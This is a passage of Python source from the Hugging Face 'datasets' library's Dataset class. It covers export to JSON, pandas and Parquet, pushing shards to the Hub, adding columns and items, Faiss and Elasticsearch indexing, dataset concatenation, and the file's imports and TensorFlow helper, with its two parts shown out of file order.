It will throw ValueError with ``orient`` different from ``"records"``, since the others are not list-like. orient (:obj:`str`, default ``"records"``): Format of the JSON: - ``"records"``: list like ``[{column -> value}, … , {column -> value}]`` - ``"split"``: dict like ``{"index" -> [index], "columns" -> [columns], "data" -> [values]}`` - ``"index"``: dict like ``{index -> {column -> value}}`` - ``"columns"``: dict like ``{column -> {index -> value}}`` - ``"values"``: just the values array - ``"table"``: dict like ``{"schema": {schema}, "data": {data}}`` **to_json_kwargs: Parameters to pass to pandas's `pandas.DataFrame.to_json <https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.to_json.html>`_. Returns: int: The number of characters or bytes written. """ # Dynamic import to avoid circular dependency from .io.json import JsonDatasetWriter return JsonDatasetWriter(self, path_or_buf, batch_size=batch_size, num_proc=num_proc, **to_json_kwargs).write() def to_pandas( self, batch_size: Optional[int] = None, batched: bool = False ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Returns the dataset as a :class:`pandas.DataFrame`. Can also return a generator for large datasets. Args: batched (``bool``): Set to :obj:`True` to return a generator that yields the dataset as batches of ``batch_size`` rows. Defaults to :obj:`False` (returns the whole datasetas once) batch_size (Optional ``int``): The size (number of rows) of the batches if ``batched`` is `True`. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. Returns: `pandas.DataFrame` or `Iterator[pandas.DataFrame]` """ if not batched: return query_table( table=self._data, key=slice(0, len(self)), indices=self._indices if self._indices is not None else None, ).to_pandas(types_mapper=pandas_types_mapper) else: batch_size = batch_size if batch_size else config.DEFAULT_MAX_BATCH_SIZE return ( query_table( table=self._data, key=slice(offset, offset + batch_size), indices=self._indices if self._indices is not None else None, ).to_pandas(types_mapper=pandas_types_mapper) for offset in range(0, len(self), batch_size) ) def to_parquet( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, **parquet_writer_kwargs, ) -> int: """Exports the dataset to parquet Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (Optional ``int``): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. parquet_writer_kwargs: Parameters to pass to PyArrow's :class:`pyarrow.parquet.ParquetWriter` Returns: int: The number of characters or bytes written """ # Dynamic import to avoid circular dependency from .io.parquet import ParquetDatasetWriter return ParquetDatasetWriter(self, path_or_buf, batch_size=batch_size, **parquet_writer_kwargs).write() def _push_parquet_shards_to_hub( self, repo_id: str, split: Optional[str] = None, private: Optional[bool] = False, token: Optional[str] = None, branch: Optional[str] = None, shard_size: Optional[int] = 500 << 20, ) -> Tuple[str, str, int, int]: """Pushes the dataset to the hub. The dataset is pushed using HTTP requests and does not need to have neither git or git-lfs installed. Args: repo_id (:obj:`str`): The ID of the repository to push to in the following format: `<user>/<dataset_name>` or `<org>/<dataset_name>`. Also accepts `<dataset_name>`, which will default to the namespace of the logged-in user. 
split (Optional, :obj:`str`): The name of the split that will be given to that dataset. Defaults to `self.split`. private (Optional :obj:`bool`, defaults to :obj:`False`): Whether the dataset repository should be set to private or not. Only affects repository creation: a repository that already exists will not be affected by that parameter. token (Optional :obj:`str`): An optional authentication token for the Hugging Face Hub. If no token is passed, will default to the token saved locally when logging in with ``huggingface-cli login``. Will raise an error if no token is passed and the user is not logged-in. branch (Optional :obj:`str`): The git branch on which to push the dataset. This defaults to the default branch as specified in your repository, which defaults to `"main"`. shard_size (Optional :obj:`int`): The size of the dataset shards to be uploaded to the hub. The dataset will be pushed in files of the size specified here, in bytes. Defaults to a shard size of 500MB. Returns: repo_id (:obj:`str`): ID of the repository in <user>/<dataset_name>` or `<org>/<dataset_name>` format split (:obj:`str`): name of the uploaded split uploaded_size (:obj:`int`): number of uploaded bytes dataset_nbytes (:obj:`int`): approximate size in bytes of the uploaded dataset afer uncompression Example: .. code-block:: python >>> dataset.push_to_hub("<organization>/<dataset_id>", split="evaluation") """ api = HfApi(endpoint=config.HF_ENDPOINT) token = token if token is not None else HfFolder.get_token() if token is None: raise EnvironmentError( "You need to provide a `token` or be logged in to Hugging Face with " "`huggingface-cli login`." ) if split is None: split = self.split or "train" identifier = repo_id.split("/") if len(identifier) > 2: raise ValueError( f"The identifier should be in the format <repo_id> or <namespace>/<repo_id>. It is {identifier}, " "which doesn't conform to either format." ) if len(identifier) == 2: organization, dataset_name = identifier else: dataset_name = identifier[0] organization = api.whoami(token)["name"] repo_id = f"{organization}/{dataset_name}" try: api.create_repo( dataset_name, token, repo_type="dataset", organization=organization, private=private, ) except HTTPError as err: if err.response.status_code == 409: if private is not None: logger.warning("The repository already exists: the `private` keyword argument will be ignored.") else: raise if self._indices is not None: dataset_nbytes = self.data.nbytes * len(self._indices) / len(self.data) else: dataset_nbytes = self.data.nbytes num_shards = int(dataset_nbytes / shard_size) + 1 shards = (self.shard(num_shards=num_shards, index=i, contiguous=True) for i in range(num_shards)) files = api.list_repo_files(repo_id, repo_type="dataset", revision=branch, token=token) files = [file for file in files if file.startswith("data/")] def path_in_repo(_index): return f"data/{split}-{_index:05d}-of-{num_shards:05d}.parquet" # Only delete file shards that don't currently exist. Others will be overwritten if the content is different # or will be left intact is the content is identical. 
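        # Hypothetical example: a previous push that produced data/train-00000-of-00004.parquet ..
        # data/train-00003-of-00004.parquet followed by a push with two shards deletes all four stale
        # files (same split prefix, names not among the new shard paths); files whose names match a new
        # shard path are re-uploaded instead, overwritten if changed or left untouched if identical.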
def should_delete_file(file_name): file_to_overwrite = file_name in [path_in_repo(i) for i in range(num_shards)] file_from_same_split = file_name.startswith(f"data/{split}-") return file_from_same_split and not file_to_overwrite file_shards_to_delete = [file for file in files if should_delete_file(file)] def delete_file(file): api.delete_file(file, repo_id=repo_id, token=token, repo_type="dataset", revision=branch) if len(file_shards_to_delete): for file in utils.tqdm( file_shards_to_delete, desc="Deleting unused files from dataset repository", total=len(file_shards_to_delete), disable=bool(logging.get_verbosity() == logging.NOTSET) or not utils.is_progress_bar_enabled(), ): delete_file(file) uploaded_size = 0 for index, shard in utils.tqdm( enumerate(shards), desc="Pushing dataset shards to the dataset hub", total=num_shards, disable=bool(logging.get_verbosity() == logging.NOTSET), ): buffer = BytesIO() shard.to_parquet(buffer) uploaded_size += buffer.tell() api.upload_file( path_or_fileobj=buffer.getvalue(), path_in_repo=path_in_repo(index), repo_id=repo_id, token=token, repo_type="dataset", revision=branch, identical_ok=True, ) return repo_id, split, uploaded_size, dataset_nbytes def push_to_hub( self, repo_id: str, split: Optional[str] = None, private: Optional[bool] = False, token: Optional[str] = None, branch: Optional[str] = None, shard_size: Optional[int] = 500 << 20, ): """Pushes the dataset to the hub. The dataset is pushed using HTTP requests and does not need to have neither git or git-lfs installed. Args: repo_id (:obj:`str`): The ID of the repository to push to in the following format: `<user>/<dataset_name>` or `<org>/<dataset_name>`. Also accepts `<dataset_name>`, which will default to the namespace of the logged-in user. split (Optional, :obj:`str`): The name of the split that will be given to that dataset. Defaults to `self.split`. private (Optional :obj:`bool`, defaults to :obj:`False`): Whether the dataset repository should be set to private or not. Only affects repository creation: a repository that already exists will not be affected by that parameter. token (Optional :obj:`str`): An optional authentication token for the Hugging Face Hub. If no token is passed, will default to the token saved locally when logging in with ``huggingface-cli login``. Will raise an error if no token is passed and the user is not logged-in. branch (Optional :obj:`str`): The git branch on which to push the dataset. This defaults to the default branch as specified in your repository, which defaults to `"main"`. shard_size (Optional :obj:`int`): The size of the dataset shards to be uploaded to the hub. The dataset will be pushed in files of the size specified here, in bytes. Defaults to a shard size of 500MB. Example: .. 
code-block:: python >>> dataset.push_to_hub("<organization>/<dataset_id>", split="evaluation") """ repo_id, split, uploaded_size, dataset_nbytes = self._push_parquet_shards_to_hub( repo_id=repo_id, split=split, private=private, token=token, branch=branch, shard_size=shard_size ) organization, dataset_name = repo_id.split("/") info_to_dump = self.info.copy() info_to_dump.download_checksums = None info_to_dump.download_size = uploaded_size info_to_dump.dataset_size = dataset_nbytes info_to_dump.size_in_bytes = uploaded_size + dataset_nbytes info_to_dump.splits = { split: SplitInfo(split, num_bytes=dataset_nbytes, num_examples=len(self), dataset_name=dataset_name) } buffer = BytesIO() buffer.write(f'{{"{organization}--{dataset_name}": '.encode()) info_to_dump._dump_info(buffer) buffer.write(b"}") HfApi(endpoint=config.HF_ENDPOINT).upload_file( path_or_fileobj=buffer.getvalue(), path_in_repo=config.DATASETDICT_INFOS_FILENAME, repo_id=repo_id, token=token, repo_type="dataset", revision=branch, identical_ok=True, ) @transmit_format @fingerprint_transform(inplace=False) def add_column(self, name: str, column: Union[list, np.array], new_fingerprint: str): """Add column to Dataset. .. versionadded:: 1.7 Args: name (str): Column name. column (list or np.array): Column data to be added. Returns: :class:`Dataset` """ column_table = InMemoryTable.from_pydict({name: column}) _check_column_names(self._data.column_names + column_table.column_names) # Concatenate tables horizontally table = concat_tables([self._data, column_table], axis=1) # Update features info = self.info.copy() info.features.update(Features.from_arrow_schema(column_table.schema)) table = update_metadata_with_features(table, info.features) return Dataset(table, info=info, split=self.split, indices_table=self._indices, fingerprint=new_fingerprint) def add_faiss_index( self, column: str, index_name: Optional[str] = None, device: Optional[int] = None, string_factory: Optional[str] = None, metric_type: Optional[int] = None, custom_index: Optional["faiss.Index"] = None, # noqa: F821 train_size: Optional[int] = None, faiss_verbose: bool = False, dtype=np.float32, ): """Add a dense index using Faiss for fast retrieval. By default the index is done over the vectors of the specified column. You can specify :obj:`device` if you want to run it on GPU (:obj:`device` must be the GPU index). You can find more information about Faiss here: - For `string factory <https://github.com/facebookresearch/faiss/wiki/The-index-factory>`__ Args: column (:obj:`str`): The column of the vectors to add to the index. index_name (Optional :obj:`str`): The index_name/identifier of the index. This is the index_name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`. By default it corresponds to `column`. device (Optional :obj:`int`): If not None, this is the index of the GPU to use. By default it uses the CPU. string_factory (Optional :obj:`str`): This is passed to the index factory of Faiss to create the index. Default index class is ``IndexFlat``. metric_type (Optional :obj:`int`): Type of metric. Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2. custom_index (Optional :obj:`faiss.Index`): Custom Faiss index that you already have instantiated and configured for your needs. train_size (Optional :obj:`int`): If the index needs a training step, specifies how many vectors will be used to train the index. faiss_verbose (:obj:`bool`, defaults to False): Enable the verbosity of the Faiss index. 
dtype (data-type): The dtype of the numpy arrays that are indexed. Default is ``np.float32``. Example: .. code-block:: python ds = datasets.load_dataset('crime_and_punish', split='train') ds_with_embeddings = ds.map(lambda example: {'embeddings': embed(example['line']})) ds_with_embeddings.add_faiss_index(column='embeddings') # query scores, retrieved_examples = ds_with_embeddings.get_nearest_examples('embeddings', embed('my new query'), k=10) # save index ds_with_embeddings.save_faiss_index('embeddings', 'my_index.faiss') ds = datasets.load_dataset('crime_and_punish', split='train') # load index ds.load_faiss_index('embeddings', 'my_index.faiss') # query scores, retrieved_examples = ds.get_nearest_examples('embeddings', embed('my new query'), k=10) """ with self.formatted_as(type="numpy", columns=[column], dtype=dtype): super().add_faiss_index( column=column, index_name=index_name, device=device, string_factory=string_factory, metric_type=metric_type, custom_index=custom_index, train_size=train_size, faiss_verbose=faiss_verbose, ) return self def add_faiss_index_from_external_arrays( self, external_arrays: np.array, index_name: str, device: Optional[int] = None, string_factory: Optional[str] = None, metric_type: Optional[int] = None, custom_index: Optional["faiss.Index"] = None, # noqa: F821 train_size: Optional[int] = None, faiss_verbose: bool = False, dtype=np.float32, ): """Add a dense index using Faiss for fast retrieval. The index is created using the vectors of `external_arrays`. You can specify `device` if you want to run it on GPU (`device` must be the GPU index). You can find more information about Faiss here: - For `string factory <https://github.com/facebookresearch/faiss/wiki/The-index-factory>`__ Args: external_arrays (:obj:`np.array`): If you want to use arrays from outside the lib for the index, you can set :obj:`external_arrays`. It will use :obj:`external_arrays` to create the Faiss index instead of the arrays in the given :obj:`column`. index_name (:obj:`str`): The index_name/identifier of the index. This is the index_name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`. device (Optional :obj:`int`): If not None, this is the index of the GPU to use. By default it uses the CPU. string_factory (Optional :obj:`str`): This is passed to the index factory of Faiss to create the index. Default index class is ``IndexFlat``. metric_type (Optional :obj:`int`): Type of metric. Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2. custom_index (Optional :obj:`faiss.Index`): Custom Faiss index that you already have instantiated and configured for your needs. train_size (Optional :obj:`int`): If the index needs a training step, specifies how many vectors will be used to train the index. faiss_verbose (:obj:`bool`, defaults to False): Enable the verbosity of the Faiss index. dtype (:obj:`numpy.dtype`): The dtype of the numpy arrays that are indexed. Default is np.float32. 
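        Example (illustrative sketch; ``embed`` is a hypothetical function returning ``np.float32`` vectors):

        .. code-block:: python

            ds = datasets.load_dataset('crime_and_punish', split='train')
            external_embeddings = embed(ds['line'])  # shape (num_rows, dim), computed outside the library
            ds.add_faiss_index_from_external_arrays(external_arrays=external_embeddings, index_name='embeddings')
            scores, retrieved_examples = ds.get_nearest_examples('embeddings', embed('my new query'), k=10)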
""" super().add_faiss_index_from_external_arrays( external_arrays=external_arrays.astype(dtype), index_name=index_name, device=device, string_factory=string_factory, metric_type=metric_type, custom_index=custom_index, train_size=train_size, faiss_verbose=faiss_verbose, ) def add_elasticsearch_index( self, column: str, index_name: Optional[str] = None, host: Optional[str] = None, port: Optional[int] = None, es_client: Optional["elasticsearch.Elasticsearch"] = None, # noqa: F821 es_index_name: Optional[str] = None, es_index_config: Optional[dict] = None, ): """Add a text index using ElasticSearch for fast retrieval. This is done in-place. Args: column (:obj:`str`): The column of the documents to add to the index. index_name (Optional :obj:`str`): The index_name/identifier of the index. This is the index name that is used to call :meth:`Dataset.get_nearest_examples` or :meth:`Dataset.search`. By default it corresponds to :obj:`column`. host (Optional :obj:`str`, defaults to localhost): host of where ElasticSearch is running port (Optional :obj:`str`, defaults to 9200): port of where ElasticSearch is running es_client (Optional :obj:`elasticsearch.Elasticsearch`): The elasticsearch client used to create the index if host and port are None. es_index_name (Optional :obj:`str`): The elasticsearch index name used to create the index. es_index_config (Optional :obj:`dict`): The configuration of the elasticsearch index. Default config is:: { "settings": { "number_of_shards": 1, "analysis": {"analyzer": {"stop_standard": {"type": "standard", " stopwords": "_english_"}}}, }, "mappings": { "properties": { "text": { "type": "text", "analyzer": "standard", "similarity": "BM25" }, } }, } Example: .. code-block:: python es_client = elasticsearch.Elasticsearch() ds = datasets.load_dataset('crime_and_punish', split='train') ds.add_elasticsearch_index(column='line', es_client=es_client, es_index_name="my_es_index") scores, retrieved_examples = ds.get_nearest_examples('line', 'my new query', k=10) """ with self.formatted_as(type=None, columns=[column]): super().add_elasticsearch_index( column=column, index_name=index_name, host=host, port=port, es_client=es_client, es_index_name=es_index_name, es_index_config=es_index_config, ) return self @transmit_format @fingerprint_transform(inplace=False) def add_item(self, item: dict, new_fingerprint: str): """Add item to Dataset. .. versionadded:: 1.7 Args: item (dict): Item data to be added. 
Returns: :class:`Dataset` """ item_table = InMemoryTable.from_pydict({k: [v] for k, v in item.items()}) # We don't call _check_if_features_can_be_aligned here so this cast is "unsafe" dset_features, item_features = _align_features([self.features, Features.from_arrow_schema(item_table.schema)]) # Cast to align the schemas of the tables and concatenate the tables table = concat_tables( [ self._data.cast(pa.schema(dset_features.type)) if self.features != dset_features else self._data, item_table.cast(pa.schema(item_features.type)), ] ) if self._indices is None: indices_table = None else: item_indices_array = pa.array([len(self._data)], type=pa.uint64()) item_indices_table = InMemoryTable.from_arrays([item_indices_array], names=["indices"]) indices_table = concat_tables([self._indices, item_indices_table]) info = self.info.copy() info.features.update(item_features) table = update_metadata_with_features(table, info.features) return Dataset( table, info=info, split=self.split, indices_table=indices_table, fingerprint=new_fingerprint, ) def align_labels_with_mapping(self, label2id: Dict, label_column: str) -> "Dataset": """Align the dataset's label ID and label name mapping to match an input :obj:`label2id` mapping. This is useful when you want to ensure that a model's predicted labels are aligned with the dataset. The alignment in done using the lowercase label names. Args: label2id (:obj:`dict`): The label name to ID mapping to align the dataset with. label_column (:obj:`str`): The column name of labels to align on. Example: .. code-block:: python # dataset with mapping {'entailment': 0, 'neutral': 1, 'contradiction': 2} ds = load_dataset("glue", "mnli", split="train") # mapping to align with label2id = {'CONTRADICTION': 0, 'NEUTRAL': 1, 'ENTAILMENT': 2} ds_aligned = ds.align_labels_with_mapping(label2id, "label") """ # Sanity checks if label_column not in self._data.column_names: raise ValueError(f"Column ({label_column}) not in table columns ({self._data.column_names}).") label_feature = self.features[label_column] if not isinstance(label_feature, ClassLabel): raise ValueError( f"Aligning labels with a mapping is only supported for {ClassLabel.__name__} column, and column {label_feature} is {type(label_feature).__name__}." ) # Sort input mapping by ID value to ensure the label names are aligned label2id = dict(sorted(label2id.items(), key=lambda item: item[1])) label_names = list(label2id.keys()) # Some label mappings use uppercase label names so we lowercase them during alignment label2id = {k.lower(): v for k, v in label2id.items()} int2str_function = label_feature.int2str def process_label_ids(batch): dset_label_names = [ int2str_function(label_id).lower() if label_id is not None else None for label_id in batch[label_column] ] batch[label_column] = [ label2id[label_name] if label_name is not None else None for label_name in dset_label_names ] return batch features = self.features.copy() features[label_column] = ClassLabel(num_classes=len(label_names), names=label_names) return self.map(process_label_ids, features=features, batched=True, desc="Aligning the labels") def concatenate_datasets( dsets: List[Dataset], info: Optional[Any] = None, split: Optional[Any] = None, axis: int = 0, ): """ Converts a list of :class:`Dataset` with the same schema into a single :class:`Dataset`. Args: dsets (:obj:`List[datasets.Dataset]`): List of Datasets to concatenate. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. 
split (:class:`NamedSplit`, optional): Name of the dataset split. axis (``{0, 1}``, default ``0``, meaning over rows): Axis to concatenate over, where ``0`` means over rows (vertically) and ``1`` means over columns (horizontally). .. versionadded:: 1.6.0 """ # Ignore datasets with no rows if any(dset.num_rows > 0 for dset in dsets): dsets = [dset for dset in dsets if dset.num_rows > 0] else: # Return first dataset if all datasets are empty return dsets[0] # Perform checks (and a potentional cast if axis=0) if axis == 0: _check_if_features_can_be_aligned([dset.features for dset in dsets]) else: if not all([dset.num_rows == dsets[0].num_rows for dset in dsets]): raise ValueError("Number of rows must match for all datasets") _check_column_names([col_name for dset in dsets for col_name in dset._data.column_names]) # Find common format or reset format format = dsets[0].format if any(dset.format != format for dset in dsets): format = {} logger.info("Some of the datasets have disparate format. Resetting the format of the concatenated dataset.") def apply_offset_to_indices_table(table, offset): if offset == 0: return table else: array = table["indices"] new_array = pc.add(array, pa.scalar(offset, type=pa.uint64())) return InMemoryTable.from_arrays([new_array], names=["indices"]) # Concatenate indices if they exist if any(dset._indices is not None for dset in dsets): if axis == 0: # Datasets with no indices tables are replaced with a dataset with an indices table in memory. # Applying an offset to an indices table also brings the table in memory. indices_tables = [] for i in range(len(dsets)): if dsets[i]._indices is None: dsets[i] = dsets[i].select(range(len(dsets[i]))) indices_tables.append(dsets[i]._indices) # An offset needs to be applied to the indices before concatenating offset = 0 for i in range(len(dsets)): indices_tables[i] = apply_offset_to_indices_table(indices_tables[i], offset) offset += len(dsets[i]._data) # Concatenate indices indices_tables = [t for t in indices_tables if len(t) > 0] if indices_tables: indices_table = concat_tables(indices_tables) else: indices_table = InMemoryTable.from_batches([], schema=pa.schema({"indices": pa.int64()})) else: if len(dsets) == 1: indices_table = dsets[0]._indices else: for i in range(len(dsets)): dsets[i] = dsets[i].flatten_indices() indices_table = None else: indices_table = None table = concat_tables([dset._data for dset in dsets], axis=axis) if axis == 0: features_list = _align_features([dset.features for dset in dsets]) else: features_list = [dset.features for dset in dsets] table = update_metadata_with_features(table, {k: v for features in features_list for k, v in features.items()}) # Concatenate infos if info is None: info = DatasetInfo.from_merge([dset.info for dset in dsets]) fingerprint = update_fingerprint( "".join(dset._fingerprint for dset in dsets), concatenate_datasets, {"info": info, "split": split} ) # Make final concatenated dataset concatenated_dataset = Dataset( table, info=info, split=split, indices_table=indices_table, fingerprint=fingerprint, ) concatenated_dataset.set_format(**format) return concatenated_dataset # This is outside Dataset.filter as it needs to be picklable for multiprocessing def get_indices_from_mask_function( function: Callable, batched: bool, with_indices: bool, input_columns: Optional[Union[str, List[str]]], indices_mapping: Optional[Table] = None, *args, **fn_kwargs, ): if batched: # we extract indices from args *inputs, indices = args if with_indices: mask = function(*inputs, indices, **fn_kwargs) 
else: mask = function(*inputs, **fn_kwargs) else: # we get batched data (to do less look-ups) but `function` only accepts one example # therefore we need to call `function` on each example of the batch to get the mask *inputs, indices = args mask = [] if input_columns is None: # inputs only contains a batch of examples batch: dict = inputs[0] num_examples = len(batch[next(iter(batch.keys()))]) for i in range(num_examples): example = {key: batch[key][i] for key in batch} mask.append( function(example, indices[i], **fn_kwargs) if with_indices else function(example, **fn_kwargs) ) else: # inputs is a list of columns columns: List[List[Any]] = inputs num_examples = len(columns[0]) for i in range(num_examples): input = [column[i] for column in columns] mask.append( function(*input, indices[i], **fn_kwargs) if with_indices else function(*input, **fn_kwargs) ) indices_array = [i for i, to_keep in zip(indices, mask) if to_keep] if indices_mapping is not None: indices_array = pa.array(indices_array, type=pa.uint64()) indices_array = indices_mapping.column(0).take(indices_array) indices_array = indices_array.to_pylist() return {"indices": indices_array}
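# ---------------------------------------------------------------------------
# Usage sketch (illustrative only): `get_indices_from_mask_function` is the picklable
# helper that `Dataset.filter` maps over the table in batches. From user code the
# equivalent is simply (dataset name and predicate are hypothetical):
#
#     ds = datasets.load_dataset("rotten_tomatoes", split="train")
#     short = ds.filter(lambda example: len(example["text"]) < 200)
#     short_batched = ds.filter(lambda batch: [len(t) < 200 for t in batch["text"]], batched=True)
#
# Under the hood, `.filter` builds an indices mapping (a one-column "indices" table)
# and attaches it to a copy of the dataset, so no example data is rewritten.
# ---------------------------------------------------------------------------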
# coding=utf-8 # Copyright 2020 The HuggingFace Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """ Simple Dataset wrapping an Arrow Table.""" import contextlib import copy import json import os import shutil import tempfile import weakref from collections import Counter, UserDict from collections.abc import Mapping from copy import deepcopy from dataclasses import asdict from functools import partial, wraps from io import BytesIO from math import ceil, floor from pathlib import Path from typing import ( TYPE_CHECKING, Any, BinaryIO, Callable, Dict, Iterable, Iterator, List, Optional, Tuple, Union, overload, ) import fsspec import numpy as np import pandas as pd import pyarrow as pa import pyarrow.compute as pc from huggingface_hub import HfApi, HfFolder from multiprocess import Pool, RLock from requests import HTTPError from tqdm.auto import tqdm from . import config, utils from .arrow_reader import ArrowReader from .arrow_writer import ArrowWriter, OptimizedTypedSequence from .features import ClassLabel, Features, FeatureType, Sequence, Value, _ArrayXD, pandas_types_mapper from .filesystems import extract_path_from_uri, is_remote_filesystem from .fingerprint import ( fingerprint_transform, generate_fingerprint, generate_random_fingerprint, get_temporary_cache_files_directory, is_caching_enabled, maybe_register_dataset_for_temp_dir_deletion, update_fingerprint, ) from .formatting import format_table, get_format_type_from_alias, get_formatter, query_table from .info import DatasetInfo from .search import IndexableMixin from .splits import NamedSplit, Split, SplitInfo from .table import ( InMemoryTable, MemoryMappedTable, Table, cast_with_sliced_list_support, concat_tables, list_table_cache_files, ) from .tasks import TaskTemplate from .utils import logging from .utils.deprecation_utils import deprecated from .utils.file_utils import estimate_dataset_size from .utils.info_utils import is_small_dataset from .utils.py_utils import unique_values from .utils.typing import PathLike if TYPE_CHECKING: from .dataset_dict import DatasetDict logger = logging.get_logger(__name__) class LazyDict(UserDict): def __init__(self, data, features=None, decoding=True): self.data = data self.features = ( {key: feature for key, feature in features.items() if hasattr(feature, "decode_example")} if features else {} ) self.decoding = decoding def values(self): return self.data.values() def items(self): return self.data.items() class Example(LazyDict): def __getitem__(self, key): value = super().__getitem__(key) if self.decoding and self.features and key in self.features: value = self.features[key].decode_example(value) if value is not None else None self[key] = value del self.features[key] return value class Batch(LazyDict): def __getitem__(self, key): values = super().__getitem__(key) if self.decoding and self.features and key in self.features: values = [self.features[key].decode_example(value) if value is not None else None for value in values] self[key] = values del self.features[key] return values 
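# Illustrative sketch (assumptions noted inline, not executed at import time): `Example` and
# `Batch` are lazy dicts used when a feature type defines `decode_example` (e.g. an
# audio/image-like feature). A value is decoded on first key access and then cached:
#
#     ex = Example({"img": raw_bytes}, features=features_with_decodable_img)  # hypothetical names
#     ex["img"]   # decoded via features["img"].decode_example(raw_bytes), then stored back
#     ex["img"]   # returns the cached decoded value; no second decode
#
# `Batch` behaves the same way but decodes every value of the requested column.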
class DatasetInfoMixin: """This base class exposes some attributes of DatasetInfo at the base level of the Dataset for easy access. """ def __init__(self, info: DatasetInfo, split: Optional[NamedSplit]): self._info = info self._split = split @property def info(self): """:class:`datasets.DatasetInfo` object containing all the metadata in the dataset.""" return self._info @property def split(self): """:class:`datasets.NamedSplit` object corresponding to a named dataset split.""" return self._split @property def builder_name(self) -> str: return self._info.builder_name @property def citation(self) -> str: return self._info.citation @property def config_name(self) -> str: return self._info.config_name @property def dataset_size(self) -> Optional[int]: return self._info.dataset_size @property def description(self) -> str: return self._info.description @property def download_checksums(self) -> Optional[dict]: return self._info.download_checksums @property def download_size(self) -> Optional[int]: return self._info.download_size @property def features(self) -> Features: return self._info.features @property def homepage(self) -> Optional[str]: return self._info.homepage @property def license(self) -> Optional[str]: return self._info.license @property def size_in_bytes(self) -> Optional[int]: return self._info.size_in_bytes @property def supervised_keys(self): return self._info.supervised_keys @property def task_templates(self): return self._info.task_templates @property def version(self): return self._info.version class TensorflowDatasetMixin: _TF_DATASET_REFS = set() @staticmethod def _get_output_signature(dataset: "Dataset", collate_fn: Callable, collate_fn_args: dict, batch_size: int): """Private method used by `to_tf_dataset()` to find the shapes and dtypes of samples from this dataset after being passed through the collate_fn. Args: dataset (:obj:`Dataset`): Dataset to load samples from. collate_fn(:obj:`bool`): Shuffle the dataset order when loading. Recommended True for training, False for validation/evaluation. collate_fn(:obj:`Callable`): A function or callable object (such as a `DataCollator`) that will collate lists of samples into a batch. collate_fn_args (:obj:`Dict`): A `dict` of keyword arguments to be passed to the `collate_fn`. batch_size (:obj:`int`): The size of batches loaded from the dataset. Used for shape inference. Returns: :obj:`dict`: Dict mapping column names to tf dtypes :obj:`dict`: Dict mapping column names to tf.TensorSpec objects """ if config.TF_AVAILABLE: import tensorflow as tf else: raise ImportError("Called a Tensorflow-specific function but Tensorflow is not installed.") # Tensorflow needs an exact signature for tf.numpy_function, so # we need to figure out what's coming back in advance. The only way to do this is to run a test batch - # the collator may add columns, so we can't figure it out just by inspecting the dataset. 
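        # Editor's note (illustrative, hypothetical values): for a tokenized text dataset
        # collated with dynamic padding, this probe batch might produce, e.g.
        #   columns_to_dtypes = {"input_ids": np.int64, "attention_mask": np.int64}
        #   signatures = {"input_ids": tf.TensorSpec(shape=(None, None), dtype=tf.int64), ...}
        # Non-numeric (e.g. string) columns are dropped here rather than handed to TensorFlow.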
if len(dataset) == 0: raise ValueError("Unable to get the output signature because the dataset is empty.") test_batch_size = min(len(dataset), 4) test_batch = dataset[:test_batch_size] test_batch = [{key: value[i] for key, value in test_batch.items()} for i in range(test_batch_size)] test_batch = collate_fn(test_batch, **collate_fn_args) columns_to_dtypes = {} for key, array in test_batch.items(): # In case the collate_fn returns something strange array = np.array(test_batch[key]) if np.issubdtype(array.dtype, np.integer) or array.dtype == np.bool: cast_dtype = np.int64 elif np.issubdtype(array.dtype, np.number): cast_dtype = np.float32 else: continue # Probably a string, but whatever it is will cause Tensorflow to shit the bed, so drop it columns_to_dtypes[key] = cast_dtype signatures = {} for column, col_feature in dataset.features.items(): if column not in columns_to_dtypes: continue shape = [] shape_feature = col_feature while not isinstance(shape_feature, (Value, ClassLabel)): if isinstance(shape_feature, _ArrayXD): shape.extend(list(shape_feature.shape)) break elif isinstance(shape_feature, Sequence): shape.insert(0, shape_feature.length) shape_feature = shape_feature.feature else: raise ValueError( f"Couldn't parse feature {column} with type {type(col_feature)}! " "This may indicate a column was included with an unusual datatype " "that we were unable to process correctly. " "If you're getting this error with one of our datasets, and you're " "sure the column should be convertable to tf.Tensor, please " "file an issue at github.com/huggingface/datasets and tag " "@rocketknight1." ) shape = [batch_size] + shape shape = [dim if dim != -1 else None for dim in shape] signatures[column] = tf.TensorSpec(shape=shape, dtype=tf.dtypes.as_dtype(columns_to_dtypes[column])) # Catching columns added by the collate_fn, such as MLM labels for column, tensor in test_batch.items(): if column in signatures: continue if column.startswith("label"): if "input_ids" in signatures and test_batch[column].shape == test_batch["input_ids"].shape: shape = signatures["input_ids"].shape else: # If this doesn't look like LM labels that got added by the collate_fn, let's not say anything # about the dimensions we're unsure of shape = [batch_size] + [None for dim in tensor.shape.as_list()[1:]] else: # If this doesn't look like LM labels that got added by the collate_fn, let's not say anything # about the dimensions we're unsure of shape = [batch_size] + [None for dim in tensor.shape.as_list()[1:]] signatures[column] = tf.TensorSpec(shape=shape, dtype=tensor.dtype) return columns_to_dtypes, signatures def to_tf_dataset( self, columns: Union[str, List[str]], batch_size: int, shuffle: bool, collate_fn: Callable, drop_remainder: bool = None, collate_fn_args: Dict[str, Any] = None, label_cols: Union[str, List[str]] = None, dummy_labels: bool = False, prefetch: bool = True, ): """Create a tf.data.Dataset from the underlying Dataset. This tf.data.Dataset will load and collate batches from the Dataset, and is suitable for passing to methods like model.fit() or model.predict(). Args: columns (:obj:`List[str]` or :obj:`str`): Dataset column(s) to load in the tf.data.Dataset. In general, only columns that the model can use as input should be included here 